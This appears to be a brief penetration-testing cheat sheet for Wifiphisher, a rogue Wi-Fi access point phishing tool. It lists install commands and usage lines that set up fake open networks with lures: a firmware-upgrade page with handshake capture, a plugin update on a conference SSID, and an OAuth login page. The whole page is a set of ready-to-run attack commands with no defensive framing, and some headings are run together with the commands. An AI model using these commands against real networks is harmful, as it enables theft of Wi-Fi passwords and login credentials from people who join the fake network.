Wifi Phishing - Wifiphisher
Wifiphisher
Installation
git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies
OR
sudo apt install wifiphisherUsage
# Basic and Simple Command
sudo wifiphisher -e "Free Wifi"
# Firmware Upgrade Scenario
wifiphisher -aI wlan0 -jI wlan4 -p firmware-upgrade --handshake-capture handshake.pcap
# Plugin Update Scenario
wifiphisher --essid CONFERENCE_WIFI -p plugin_update -pK s3cr3tp4ssw0rd
# O-Auth Login Scenario
wifiphisher --essid "FREE WI-FI" -p oauth-login -kBREFERENCES
Last updated